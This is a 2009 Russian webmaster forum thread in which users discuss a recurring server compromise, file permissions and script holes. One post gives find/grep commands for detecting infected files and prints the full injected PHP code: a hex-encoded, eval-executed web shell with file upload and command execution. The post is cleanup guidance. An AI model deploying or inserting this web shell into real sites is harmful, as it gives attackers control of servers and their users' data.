Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
CJs
»
Тема:
Хакнули мой сервер, выясняю может кого еще
Новая тема
Ответить
цитата
22/04/09 в 02:14
Zizi
всем спс
color:
сорри, ася не работала, не знал, что вы отписали... просто он вернулся, потому забил тревогу )
цитата
22/04/09 в 04:45
lega_cobra
color писал:
многие скрипты требуют права на запись на файлы которые они генерят и которые потом инклудятся.
Это дырявые скрипты. Это вопросы к программерам таких скриптов. Из-за них куча проблем возникает, и иногда потери гораздо больше, чем приобретения от таких скриптов.
цитата
22/04/09 в 05:59
Soft-Com
не факт что права 777 на директорию гарантируют взлом сервера, точно так же как и права 755 (644) - не гарантируют безопасность.
Я думаю что ни для кого не секрет что большинство вменяемых администраторов запускают юзерские апачи,нгинксы (веб-сервисы) в чруте или со сменой юзера через suexec/suphp, или запуском фцги-менеджера от юзера.
поэтому в ЛЮБОМ случае скрипт будет иметь право на запись в СВОИ директории.
поэтому только правами НИКОГДА нельзя защитить сервер, это помоему очевидно.
если админ говорит что не через фтп/ссх сломали (99.999% что он прав), дырка в скриптах, установленных блогах, линк-ексченджах и т.д.
цитата
22/04/09 в 17:27
old_fly
мне тоже кое-что поломали.
там где было жестко 444. все заебись.
где 666 - вставлен код. (в основном в .tpl файлы)
пустые индексные файлы тоже присутствуют
цитата
22/04/09 в 23:43
dlk44
Zizi писал:
а зависит ли уязвимость/безопасность сервака от его стоимости?
подскажите альтернативу FTP...
1. Нет
2. sftp, ftps, ssh. А можно еще VPN на сервер поставить и через него пускать FTP.
цитата
22/04/09 в 23:57
dlk44
Soft-Com писал:
не факт что права 777 на директорию гарантируют взлом сервера, точно так же как и права 755 (644) - не гарантируют безопасность.
Я думаю что ни для кого не секрет что большинство вменяемых администраторов запускают юзерские апачи,нгинксы (веб-сервисы) в чруте или со сменой юзера через suexec/suphp, или запуском фцги-менеджера от юзера.
поэтому в ЛЮБОМ случае скрипт будет иметь право на запись в СВОИ директории.
поэтому только правами НИКОГДА нельзя защитить сервер, это помоему очевидно.
если админ говорит что не через фтп/ссх сломали (99.999% что он прав), дырка в скриптах, установленных блогах, линк-ексченджах и т.д.
Ну все же похоже на то, что "большинство вменяемых администраторов" это не более 70% от администраторов. Поэтому вебшелы так и процветают.
цитата
23/04/09 в 01:01
color
Вебшеллы процветают от кривых скриптов
цитата
23/04/09 в 01:03
color
dlk44 писал:
2. sftp, ftps, ssh.
да можно хоть все сервисы кроме http отключить, только от проблемы топикстартера это не спасет
Цитата:
А можно еще VPN на сервер поставить и через него пускать FTP.
это еще зачем такой изврат?
цитата
23/04/09 в 09:02
Soft-Com
Разговор зашёл уже далеко от темы ТС.
Если не доверяешь админу, закажи у нормальной команды аудит сервера, тебе и админу нормально распишут где он (или ты) ошиблись и скажут что и как делать.
Если с админом работаешь давно и нормально, то лучше всего просто выполнять все его требования - чем меньше проблем ты создаёшь для админа, тем больше вероятность того что он будет дырки своевременно искать, тем более если админ один, а не пара-тройка.
цитата
23/04/09 в 11:07
Grebezen
народ, кто-то понял как от этого избавиться? Вирусы удаляем. а они периодически заново появляются. затрахали уже.
Soft-Com:
ты прав насчет прав, у меня именно такая ситуация, вирусы пихаются везде где апач имеет право на запись.
цитата
23/04/09 в 11:10
Soft-Com
Если есть желание, стукнись плс в аську (в профиле), разберёмся с твоим сервером.
цитата
23/04/09 в 13:21
old_fly
Так источник взлома нашли?
Со следствием уже расквитался (и предупредил от дальнейших изменений файлов путем замены прав на 444), но причина пока до сих пор не найдена
цитата
23/04/09 в 14:08
Grebezen
пока не нашли причину, ищем.
цитата
24/04/09 в 13:14
Grebezen
Soft-Com:
нашел источник заражения, теперь все ок, кто столкнулся с такой проблемой - обращайтесь к нему.
цитата
24/04/09 в 13:34
Ziegfrid
А тем кто не столкнулся рассказать?
Знать бы тоже хотелось.
цитата
24/04/09 в 13:37
Grebezen
к сожалению я не админ, разъяснить не могу, но у меня сервере лежал скрипт, который генерел эксплоиты и пихал куда тольео мог регулярно. Сначала мы только удаляли уже результат, но потом
Soft-Com:
нашел сам источник- этот скрипт. Как скрипт попал на сервер- неясно.
цитата
24/04/09 в 13:54
Soft-Com
Спасибо
Grebezen
за предоставленную площадку
.
для того чтобы найти скрипты с php-инъекцией можно попробовать так:
Код:
find / -name \*.php -exec grep -EH "202069662028245F504F53545B706" {} \; | awk -F":" '{print $1}'
найденные файлы нужно проверить, убедиться что они нах не нужны и удалить. Может получиться так, что инъекция в нужном файлике, тогда надо удалить кусок кода
Код:
<?php $s="202069662028245F504F53545B706173735D213D273132332729207B206563686F2027203C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643
D22646F63756D656E742E6D79662E706173732E666F63757328293B223E3C666F726D206D6574686F643D504F53543E3C696E707574206E616D653D706173733E3C2F666F726D3E3C2F626F
64793E20203C2F68746D6C3E273B206578697428293B207D6563686F20273C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643D22646F63756D656E742E6
D79662E63632E666F63757328293B223E273B6563686F20273C666F726D206E616D653D6D7966206D6574686F643D504F535420656E63747970653D226D756C7469706172742F666F726D2D
64617461223E3C696E70757420747970653D68696464656E206E616D653D706173732076616C75653D272E245F504F53545B706173735D2E273E3C696E70757420747970653D66696C65206
E616D653D757066696C653E3C696E707574206E616D653D6E65776E616D653E3C696E70757420747970653D7375626D69743E3C62723E273B6563686F20273C696E707574206E616D653D63
632073697A653D37332076616C75653D22272E7374726970736C617368657328245F504F53545B63635D292E27223E3C2F666F726D3E273B6563686F20273C7072653E273B20696620286D6
F76655F75706C6F616465645F66696C6528245F46494C45535B27757066696C65275D5B27746D705F6E616D65275D2C20245F504F53545B6E65776E616D655D2929207B202F2A6563686F20
2253656E742E3C62723E5C6E223B2A2F207D69662028245F504F53545B6D66696C655D29207B2020202466703D666F70656E28245F504F53545B6E65776E616D655D2C277727293B2020206
66F7228246B3D303B20246B3C7374726C656E28245F504F53545B6D66696C655D293B20246B2B3D322920207B20202020246363203D2073756273747228245F504F53545B6D66696C655D2C
246B2C32293B20202020246363203D20273078272E2463633B2020202020202020246363203D20726F756E6428246363293B20202020246363203D2063687228246363293B2020202066777
2697465282466702C246363293B2020207D202066636C6F736528246670293B207D24636F3D7374726970736C617368657328245F504F53545B63635D293B206563686F206024636F603B20
6563686F20273C2F7072653E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B20";$sss="";for($k=0;$k<strlen($s);$k+=2){$ss=chr(("0x".substr($s,$k,2))+0);$ss
s.=$ss;}eval($sss);$ssss="**********************************";?>
затем нужно вычистить инфицированные трояном хтмльки
Код:
for i in php html htm tpl inc; do find / -name \*.$i -exec grep -H "wlxfnvmg.ylwb.zkkvm" {} \; | awk -F":" '{print $1}'; done
P.S.
шаблоны, по которым ведётся поиск МОГУТ отличаться, потому что тот кто его закинул очевидно не дебил, и используются разные названия функций и т.д. Алгоритм, который я тут привёл скорее подсказка для ваших админов, а по хорошему нужно генерить пару раз hex-код трояна в хтмльках, для того чтобы найти материнский скрипт, который и генерит скрипты с php-инъекцией, к которым потом идёт запрос через веб, и которые рассаживают троянов в хтмльки.
и всё вышеизложенное не гарантирует защиту от взлома в будущем - тут надо именно сервер смотреть и проверять на безопасность.
P.P.S.
буду рад помочь желающим за некоторые материальные блага
.
Стр.
« первая
<
1
,
2
Новая тема
Ответить
Эта страница в полной версии